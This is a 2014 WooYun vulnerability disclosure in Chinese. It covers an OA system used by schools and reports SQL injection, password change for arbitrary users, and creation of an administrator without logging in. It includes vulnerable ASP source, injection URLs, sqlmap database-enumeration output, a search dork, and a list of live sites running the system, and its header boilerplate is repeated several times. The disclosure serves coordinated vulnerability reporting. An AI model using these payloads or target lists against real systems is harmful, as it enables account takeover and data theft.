某OA系统SQL注入+任意用户密码修改+添加管理员漏洞（无需登录）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061449

漏洞标题：某OA系统SQL注入+任意用户密码修改+添加管理员漏洞（无需登录）

漏洞作者： xfkxfk

提交时间：2014-05-19 17:25

修复时间：2014-08-17 17:26

公开时间：2014-08-17 17:26

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-19：细节已通知厂商并且等待厂商处理中
2014-05-24：厂商已经确认，细节仅向厂商公开
2014-05-27：细节向第三方安全合作伙伴开放
2014-07-18：细节向核心白帽子及相关领域专家公开
2014-07-28：细节向普通白帽子公开
2014-08-07：细节向实习白帽子公开
2014-08-17：细节向公众公开

简要描述：

官网demo中招

详细说明：

广州市颖峰信息科技有限公司
http://www.yfidea.com/product.asp
官方demo地址：
http://demo.yfidea.com/
官方成功案例：
http://www.yfidea.com/AnLi.asp
Google搜索案例：
Google关键字：技术支持：创想颖峰
搜索结果：43,400
从官网和搜索结果中看，用户还是很多的。
http://oa.bh5z.net/Index.asp
http://222.178.145.174:8000/Index.asp
http://oa.gz65.com/
http://hsoa.bgyhs.net/
http://www.xmqwzx.com/Index.asp
http://oa.lhljzx.com/
......
使用此OA的都是学校和教育部门，用户量很多，影响范围不小。

漏洞证明：

0x001 SQL注入漏洞一
/oa/user/modifyuser.asp文件：

</head>
   <%
   dim strID
   strId=request("id")
   set rs=server.createobject("adodb.recordset")
   sql="select * from teachers  where tid='"&strId& "'"
   rs.open sql,conn,1,1
%>
<body class="bodycolor" topmargin="5" >
<table border="0" width="100%" cellspacing="0" cellpadding="3" class="small">
  <tr>
    <td class="Big"> <p>修改</p>
    <p>　</p></td>
  </tr>
</table>
<br>
 <table border="0" width="420" cellpadding="2" cellspacing="1" align="center" class="small">
  <form action="Savemodifyuser.asp"  method="post" name="form1" onSubmit="return CheckForm();">
    <tr>
      <td height="38" nowrap class="STYLE1">　</td>
      <td class="STYLE1">
	  <input type="hidden" name="id" value='<%=Rs("tid")%>'>
	  </td>
    </tr>
    <tr>
      <td width="120" height="38" nowrap class="STYLE1"><div align="right">用户：</div></td>
          <td width="289" class="STYLE1"><!-------------- 时 ------------>
              <label>
              <input name="Tno" type="text" id="Tno"  value=<%=Rs("Tno")%>>
      </label></td>
    </tr>
        <tr>
          <td height="38" nowrap class="STYLE1"><div align="right">姓名：</div></td>
          <td class="STYLE1"><!-------------- 时 ------------>
              <input name="Tname" type="text" id="Tname"  value=<%=Rs("Tname")%>></td>
        </tr>
        <tr>
          <td nowrap class="STYLE1"><div align="right">权限组：</div></td>
          <td align="center" class="STYLE1"><div align="left">
            <select name="powdergroup" id="powdergroup">
              
              <option><%=Rs("powdergroup")%></option>
              <% Set RSsel = Conn.Execute("select vname,shuoming from  varset where name='powdergroup' order by vid")
                   While NOT RSsel.EOF %>
              <option value=<%=RSsel( "vname" )%>><%=RSsel( "vname" )%></option>
              <% RSsel.MoveNext
                  Wend
                  RSsel.Close%>
            </select> 
          </div></td>
        </tr>
    <tr>
      <td nowrap class="STYLE1">　</td>
      <td align="center" class="STYLE1"><label for="SMS_REMIND"></label></td>
    </tr>
    <tr align="center" class="TableControl">
      <td colspan="2" nowrap class="STYLE1">
        <input type="submit" value="确定" class="topanniu" >  
        &nbsp;&nbsp;
        <input type="button" value="关闭" class="topanniu" onClick="window.close();">      </td>
    </tr></form>
</table>

这里的id存在注入
http://demo.yfidea.com/oa/user/modifyuser.asp?iD=2' and 'a'='a
http://demo.yfidea.com/oa/user/modifyuser.asp?iD=2' and 'a'='b

---
[16:19:14] [INFO] testing Microsoft SQL Server
[16:19:14] [INFO] confirming Microsoft SQL Server
[16:19:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2000
[16:19:14] [INFO] fetching database names
[16:19:15] [INFO] the SQL query used returns 7 entries
[16:19:15] [INFO] retrieved: "master"
[16:19:15] [INFO] retrieved: "model"
[16:19:15] [INFO] retrieved: "msdb"
[16:19:16] [INFO] retrieved: "Northwind"
[16:19:16] [INFO] retrieved: "pubs"
[16:19:16] [INFO] retrieved: "tempdb"
[16:19:16] [INFO] retrieved: "YFWebOA"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YFWebOA

SQL注入漏洞二
/oa/user/savepassword.asp文件：

<!--#include file="../SQLconn.asp"-->
<% 
   new1=request("new1")
 
  tname=request.cookies("tname")
   set RsPlan=server.createobject("adodb.recordset")
       RsPlansql="select * from Teachers where tname='"&tname& "'"
       RsPlan.open RsPlansql,conn,1,3
	   RsPlan("TPassWord")=new1
       RsPlan.update
       RsPlan.close
	
%>

这里的new1和cookie中的tname都没有过滤，都存在SQL注入漏洞。
0x002 任意用户密码修改漏洞
修改用户密码的链接为：
http://demo.yfidea.com/oa/user/password.asp
这里可以修改密码，但是会通过js进行比较及密码和登陆后的用户密码是否一致，一致后则提交内容到savepassword.asp进行修改密码。
虽然这里进行了比较但是是在js里面进行的比较，禁掉js进行提交即可修改。
或者直接提交表单到savepassword.asp进行修改。
/oa/user/savepassword.asp文件：

<!--#include file="../SQLconn.asp"-->
<% 
   new1=request("new1")
 
  tname=request.cookies("tname")
   set RsPlan=server.createobject("adodb.recordset")
       RsPlansql="select * from Teachers where tname='"&tname& "'"
       RsPlan.open RsPlansql,conn,1,3
	   RsPlan("TPassWord")=new1
       RsPlan.update
       RsPlan.close	
%>

可以看到这里在修改用户密码时，从Cookie中获取用户名，然后GET获取新密码new1然后就可修改此用户名的密码了。

0x003 添加管理员漏洞
1、我们通过越权搞到所有的注册用户：
http://demo.yfidea.com/oa/user/modifyuser.asp?iD=2
通过遍历这个id就能看到所有的注册用户

2、然后我们可以提权这里的任意用户为管理员，或者其他任意权限都可以

<% 
    strId=request("id")
    Tno=request("Tno")
    Tname=request("Tname")
    powdergroup=request("powdergroup")
  
   set RsPlan=server.createobject("adodb.recordset")
       RsPlansql="select * from Teachers  where tid='"&strId& "'"
       RsPlan.open RsPlansql,conn,1,3
       RsPlan("Tno")=Tno
	   RsPlan("Tname")=Tname
	  
	   RsPlan("powdergroup")=powdergroup
       RsPlan.update
       RsPlan.close   
%>

这里没有判断权限，直接根据获取的参数值进行修改用户的权限

3、然后结合第2个漏洞，根据用户名修改此用户的密码，既可以拿到管理员
通过上面的漏洞，我可以拖库，可以轻易拿下管理员。

修复方案：

过滤参数。
控制用户访问权限。

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-05-24 12:53

厂商回复：

CNVD确认并复现所述案例情况，先由CNVD通过公开联系渠道向软件生产厂商通报，对方确认测试网站修复。后续又下发给广东分中心继续跟踪处置，软件生产厂商反馈3.93版本已经修复。广东分中心经过仔细检测，确认仍然存在相关漏洞，目前仍然在进一步协调中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061449

漏洞标题：某OA系统SQL注入+任意用户密码修改+添加管理员漏洞（无需登录）

相关厂商：广州市颖峰信息科技有限公司

漏洞作者： xfkxfk

提交时间：2014-05-19 17:25

修复时间：2014-08-17 17:26

公开时间：2014-08-17 17:26

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061449

漏洞标题：某OA系统SQL注入+任意用户密码修改+添加管理员漏洞（无需登录）

相关厂商：广州市颖峰信息科技有限公司

漏洞作者： xfkxfk

提交时间：2014-05-19 17:25

修复时间：2014-08-17 17:26

公开时间：2014-08-17 17:26

漏洞类型：非授权访问/权限绕过

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061449"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：